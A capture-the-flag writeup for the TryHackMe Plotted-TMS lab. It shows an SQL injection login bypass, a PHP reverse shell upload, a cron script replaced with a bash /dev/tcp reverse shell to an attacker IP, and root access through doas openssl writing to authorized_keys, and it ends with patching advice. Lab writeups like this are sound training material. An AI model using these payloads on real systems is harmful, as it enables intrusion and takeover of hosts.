--- title: "Writeup - Plotted-TMS (THM)" date: 2022-03-31 slug: "writeup-plotted-tms-thm" type: "writeup-ctf" --- This is a writeup for the [Plotted-TMS](https://tryhackme.com/room/plottedtms) machine from the TryHackMe site. ## Enumeration First, let's start with a scan of our target with the following command: ```bash nmap -sV -T4 -Pn 10.10.173.55 ``` Three TCP ports are discovered: ![](img/image-1.webp) - 22/tcp : SSH port (OpenSSH 8.2) - 80/tcp : HTTP web server (Apache 2.4.41) - 445/tcp : HTTP web server (Apache 2.4.41) ## Exploit I start by listing the directories of the site hosted on port 445: ![](img/image-2.webp) We find a `management` page that gives us access to an admin login page. ![](img/image-3.webp) After a few injection tests I finally managed to connect with the following injection: ```bash Username = ' or 1=1;-- - ``` I now have access to the admin panel of the site. ![](img/image-4.webp) In this panel I find the `Settings` page. This page allows to change the font image of the home page of the site. So I try to send a PHP reverse shell. ![](img/image-5.webp) Then I access it via the following address: ```bash http://10.10.173.55:445/management/uploads/ ``` I now have a reverse shell with the user `www-data`. ![](img/image-6.webp) After some research I find that the first flag is in the personal folder of the user `plot_admin`, problem I do not have the right to read it. So I will have to find a way to change the user. ![](img/image-7.webp) After launching [linPeas](https://linpeas.sh) on the machine I find that every minute a script backup.sh is launched by the user `plot_admin`. ![](img/image-8.webp) I don't have the permissions to change the content of the script, but I have the permissions to change the content of the `/var/www/scripts` folder. So I will be able to replace the current script, by a custom script allowing me to have a reverse shell as `plot_admin`. To do this I use the following commands: ```bash mv backup.sh tmp touch backup.sh echo "bash -c '/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1'" > backup.sh chmod +x backup.sh ``` ![](img/image-9.webp) I now have a reverse shell with the user `plot_admin` and I can get the first flag. ## Privilege escalation I start by listing the SUID files with the following command: ```bash find / -perm -u=s -type f 2>/dev/null ``` I found a command not very common: [doas](https://man.openbsd.org/doas). This command is an alternative to the `sudo` command. After some research I find on this [site](https://book.hacktricks.xyz/linux-unix/privilege-escalation#doas) that the config file of this command is at the following address: `/etc/doas.conf`. ![](img/image-10.webp) I find that my user can execute the `openssl` command with admin rights. So I'm looking on [GTFOBins](https://gtfobins.github.io/gtfobins/openssl/) for exploits related to this command. I find that it is possible to write in files, so I will be able to add to ssh key in the `authorized_keys` file and then connect via SSH to the root account. To do this I use the following commands: ```bash FILE=/root/.ssh/authorized_keys echo "ssh-rsa [key] kali@kali" | doas openssl enc -out "$FILE" ``` ![](img/image-11.webp) I now have a shell `root` shell and can retrieve the last flag. ## Recommendations To patch this host I think it would be necessary to perform a number of actions: - Fix the site code to avoid SQL injections ([OWASP SQL Injection](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)) - Implement code detection in the admin panel image uploads - Store CRON scripts in a folder accessible only by the author - Do not allow root rights on commands that do not require it